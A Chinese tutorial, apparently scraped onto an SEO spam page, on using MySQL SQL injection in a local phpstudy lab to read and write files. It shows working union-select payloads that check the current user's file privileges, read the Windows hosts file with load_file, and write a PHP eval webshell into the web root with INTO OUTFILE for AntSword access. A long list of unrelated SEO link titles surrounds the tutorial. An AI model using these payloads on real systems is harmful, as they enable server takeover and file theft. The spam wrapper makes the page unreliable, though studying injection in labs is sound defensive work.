当前位置: 首页 > news >正文

本周时事新闻概要10条企业整站seo

本周时事新闻概要10条,企业整站seo,做趣味图形的网站,wordpress自定义短码文章目录 条件利用SQL注入漏洞读取hosts文件查看文件读写权限安全选项允许导入导出读取hosts文件 利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell写入文件 条件 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要 目的在于获取web…

文章目录

  • 条件
  • 利用SQL注入漏洞读取hosts文件
    • 查看文件读写权限
    • 安全选项允许导入导出
    • 读取hosts文件
  • 利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell
    • 写入文件

条件

SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要

目的在于获取webshell或盗取重要文件。

  1. 当前(连接)数据库的用户具有文件读写权限。
  2. 已知读写目标文件的绝对路径。

web 应用在服务器上的绝对路径,一般情况下是不知道的。

但是系统敏感文件的路径是固定的。

  1. 安全选项secure_file_priv允许导入导出操作。

secure_file_priv=null,不允许导入导出操作。

secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。

secure_file_priv= ,不对导入导出操作做限制。

利用SQL注入漏洞读取hosts文件

查看文件读写权限

输入语句逐个查看当前用户,查看到第三个用户发现他是root权限:

?id=1' and 1=2 union select 1,user(),3 --+

在这里插入图片描述

输入语句查看用户的权限

?id=1' and 1=2 union select 1,file_priv,3 from mysql.user where user='root' and host='localhost' --+

查看后用户具有文件读写权限:

在这里插入图片描述

安全选项允许导入导出

登录phpMyAdmin,点击变量,在搜索框中搜索priv,可以看到下面的变量,secure file priv的值为null:

在这里插入图片描述

然后在phpstudy中打开配置文件:

在这里插入图片描述

在mysqld中加入secure_file_priv=,保存

在这里插入图片描述

重启phpstudy,并刷新phpMyAdmin页面,搜索后发现发现变量secure file priv的值已经为空,此时已修改成功:

在这里插入图片描述

读取hosts文件

已知hosts文件的绝对路径是c:\windows\system32\drivers\etc\hosts,输入下面的联合查询语句,对hosts文件进行读取(注意需要对路径中的\进行转义):

?id=1' and 1=2 union select 1,2,load_file("c:\\windows\\system32\\drivers\\etc\\hosts") --+

读取成功:

在这里插入图片描述

利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell

写入文件

输入下面SQL语句,在www目录下写入一个muma.php文件

?id=1' and 1=2 union select 1,"<?php @eval($_REQUEST[777])?>",3 into outfile
"c:\\phpstudy\\WWW\\muma.php" --+

执行成功:

在这里插入图片描述

写入的文件:

在这里插入图片描述

http://www.khdw.cn/news/30082.html

相关文章:

  • 百度小程序制作流程网站seo优化外包
  • 建设网站要买服务器优化大师软件下载
  • 找做网站的公司安装百度到手机桌面
  • 网站建设 比选免费产品推广网站
  • 中国做网站公司排名国外搜索引擎入口
  • 做网站页面网络营销的优势
  • 免费企业网站程序asp建什么网站可以长期盈利
  • 靠谱的app开发公司百度优化软件
  • 满城做网站电话杭州免费网站制作
  • 黄埔建网站公司线上培训机构排名前十
  • 外贸网站seo教程郑州seo外包平台
  • 电子商务网络营销方式有哪些seo优化是什么职业
  • 新建的网站打不开抖音推广网站
  • 电商网站开发需求文档360指数在线查询
  • wordpress 首页调用旺道seo工具
  • 计算机网站建设实训总结开封seo公司
  • 外国游戏概念设计网站优化课程设置
  • 网站的音乐链接怎么做北京网络营销推广公司
  • 网站建设分为那几个模块长春网站建设
  • 沧州网站建设专业的公司4000-262-外贸是做什么的
  • 在线制作图片及图片处理工具免费长春seo网站排名
  • 客户对网站设计的要求博客seo优化技术
  • 网站建设目标 优帮云域名注册后如何建网站
  • 网站编程学兰州seo推广
  • 莱芜益寿堂网站杭州网站seo
  • 网站开发做什么的seo怎么才能做好
  • SEO案例网站建设公司整站seo定制
  • 淘宝优惠券网站怎么做的指数函数公式
  • alexa全球网站排名西安关键词排名提升
  • wordpress 分页文章数湖南网站seo公司